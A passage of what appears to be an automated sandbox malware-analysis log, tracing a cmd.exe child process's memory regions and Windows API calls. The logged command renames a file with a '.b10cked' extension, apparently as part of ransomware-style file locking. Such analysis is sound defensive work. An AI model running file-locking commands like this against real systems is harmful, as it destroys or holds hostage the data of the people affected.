out: lpMode=0x4a9e41b0) returned 1 [0202.919] SetConsoleInputExeNameW () returned 0x1 [0202.919] GetConsoleOutputCP () returned 0x1b5 [0202.919] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.919] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.919] exit (_Code=1) Process: id = "486" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166e0" os_pid = "0xf64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = 
"CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29471 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29472 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29473 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29474 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 29475 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29476 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29477 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29478 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29479 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 29480 start_va = 
0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29806 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29807 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29808 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29809 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 29810 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 29811 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29812 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29813 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29814 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29815 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" 
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29816 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29817 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29818 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29819 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29820 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 29821 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29822 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29823 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 29824 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 29825 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id 
= 29826 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 29827 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 29828 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 29829 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 29980 start_va = 0x12f0000 end_va = 0x13affff entry_point = 0x12f0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 683 os_tid = 0xecc [0202.296] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fc84 | out: lpSystemTimeAsFileTime=0x16fc84*(dwLowDateTime=0xad6447a0, dwHighDateTime=0x1d440a9)) [0202.296] GetCurrentProcessId () returned 0xf64 [0202.296] GetCurrentThreadId () returned 0xecc [0202.296] GetTickCount () returned 0x39194 [0202.296] QueryPerformanceCounter (in: lpPerformanceCount=0x16fc7c | out: lpPerformanceCount=0x16fc7c*=25908561283) returned 1 [0202.297] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.297] __set_app_type (_Type=0x1) [0202.297] __p__fmode () returned 0x76b331f4 [0202.297] __p__commode () returned 0x76b331fc [0202.297] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.297] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.297] GetCurrentThreadId () returned 0xecc [0202.297] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xecc) returned 0x38 [0202.297] GetModuleHandleW 
(lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.297] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.297] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.298] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.298] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fc14 | out: phkResult=0x16fc14*=0x0) returned 0x2 [0202.298] VirtualQuery (in: lpAddress=0x16fc4b, lpBuffer=0x16fbe4, dwLength=0x1c | out: lpBuffer=0x16fbe4*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.298] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fbe4, dwLength=0x1c | out: lpBuffer=0x16fbe4*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.298] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fbe4, dwLength=0x1c | out: lpBuffer=0x16fbe4*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.298] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fbe4, dwLength=0x1c | out: lpBuffer=0x16fbe4*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.298] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fbe4, dwLength=0x1c | out: lpBuffer=0x16fbe4*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.298] GetConsoleOutputCP () returned 0x1b5 [0202.298] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.298] SetConsoleCtrlHandler 
(HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.298] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.298] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.298] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.298] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.298] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.298] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.299] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.299] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.299] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.299] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.299] GetEnvironmentStringsW () returned 0x2b0160* [0202.299] FreeEnvironmentStringsW (penv=0x2b0160) returned 1 [0202.299] GetEnvironmentStringsW () returned 0x2b0160* [0202.299] FreeEnvironmentStringsW (penv=0x2b0160) returned 1 [0202.299] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eb84 | out: phkResult=0x16eb84*=0x40) returned 0x0 [0202.299] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x0, lpData=0x16eb90*=0x88, lpcbData=0x16eb88*=0x1000) returned 0x2 [0202.299] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x4, lpData=0x16eb90*=0x1, lpcbData=0x16eb88*=0x4) returned 0x0 [0202.299] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x0, lpData=0x16eb90*=0x1, lpcbData=0x16eb88*=0x1000) returned 0x2 [0202.299] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, 
lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x4, lpData=0x16eb90*=0x0, lpcbData=0x16eb88*=0x4) returned 0x0 [0202.299] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x4, lpData=0x16eb90*=0x40, lpcbData=0x16eb88*=0x4) returned 0x0 [0202.299] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x4, lpData=0x16eb90*=0x40, lpcbData=0x16eb88*=0x4) returned 0x0 [0202.300] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x0, lpData=0x16eb90*=0x40, lpcbData=0x16eb88*=0x1000) returned 0x2 [0202.300] RegCloseKey (hKey=0x40) returned 0x0 [0202.300] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eb84 | out: phkResult=0x16eb84*=0x40) returned 0x0 [0202.300] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x0, lpData=0x16eb90*=0x40, lpcbData=0x16eb88*=0x1000) returned 0x2 [0202.300] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x4, lpData=0x16eb90*=0x1, lpcbData=0x16eb88*=0x4) returned 0x0 [0202.300] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x0, lpData=0x16eb90*=0x1, lpcbData=0x16eb88*=0x1000) returned 0x2 [0202.300] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: 
lpType=0x16eb8c*=0x4, lpData=0x16eb90*=0x0, lpcbData=0x16eb88*=0x4) returned 0x0 [0202.300] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x4, lpData=0x16eb90*=0x9, lpcbData=0x16eb88*=0x4) returned 0x0 [0202.300] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x4, lpData=0x16eb90*=0x9, lpcbData=0x16eb88*=0x4) returned 0x0 [0202.300] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eb8c, lpData=0x16eb90, lpcbData=0x16eb88*=0x1000 | out: lpType=0x16eb8c*=0x0, lpData=0x16eb90*=0x9, lpcbData=0x16eb88*=0x1000) returned 0x2 [0202.300] RegCloseKey (hKey=0x40) returned 0x0 [0202.300] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.300] srand (_Seed=0x5b8863a4) [0202.300] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl.b10cked\"" [0202.300] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\nslist.hxl.b10cked\"" [0202.300] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.300] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b18c0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.300] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.301] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.301] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.301] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.301] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.301] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.301] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.301] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.301] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.301] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.301] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.301] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.301] GetEnvironmentStringsW () returned 0x2b22b0* [0202.301] FreeEnvironmentStringsW (penv=0x2b22b0) returned 1 [0202.301] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.301] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.301] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.301] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.301] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.301] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.301] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.301] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.301] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.301] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.301] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f950 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.301] 
GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f950, lpFilePart=0x16f94c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f94c*="Desktop") returned 0x18 [0202.301] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.301] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f6cc | out: lpFindFileData=0x16f6cc) returned 0x2afff0 [0202.302] FindClose (in: hFindFile=0x2afff0 | out: hFindFile=0x2afff0) returned 1 [0202.302] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f6cc | out: lpFindFileData=0x16f6cc) returned 0x2afff0 [0202.302] FindClose (in: hFindFile=0x2afff0 | out: hFindFile=0x2afff0) returned 1 [0202.302] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f6cc | out: lpFindFileData=0x16f6cc) returned 0x2afff0 [0202.302] FindClose (in: hFindFile=0x2afff0 | out: hFindFile=0x2afff0) returned 1 [0202.302] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.302] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.302] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.302] GetEnvironmentStringsW () returned 0x2b2ad0* [0202.302] FreeEnvironmentStringsW (penv=0x2b2ad0) returned 1 [0202.302] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.303] GetConsoleOutputCP () returned 0x1b5 [0202.303] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.303] GetUserDefaultLCID () returned 0x409 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.303] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x23, lpLCData=0x16fa90, cchData=128 | out: lpLCData="0") returned 2 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fa90, cchData=128 | out: lpLCData="0") returned 2 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fa90, cchData=128 | out: lpLCData="1") returned 2 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.303] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.304] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.304] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.304] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.304] GetConsoleTitleW (in: lpConsoleTitle=0x2a08c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.304] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.305] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.305] GetProcAddress (hModule=0x76910000, 
lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.305] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.305] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.305] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.305] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.305] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.305] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.305] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.305] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.309] GetConsoleTitleW (in: lpConsoleTitle=0x16f788, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.310] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.310] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.310] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.310] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.310] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.310] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.310] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.310] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.310] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.310] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.310] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.310] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.310] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.310] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.310] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.310] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.310] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.310] _wcsicmp (_String1="move", _String2="RD") returned -5 [0202.310] _wcsicmp (_String1="move", 
_String2="RMDIR") returned -5 [0202.310] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.310] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.310] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.310] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.310] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.310] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.310] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.310] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.310] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.310] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.310] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.310] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.310] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.310] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0202.310] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.310] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.312] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.312] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.312] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f544, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f53c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f53c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.312] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 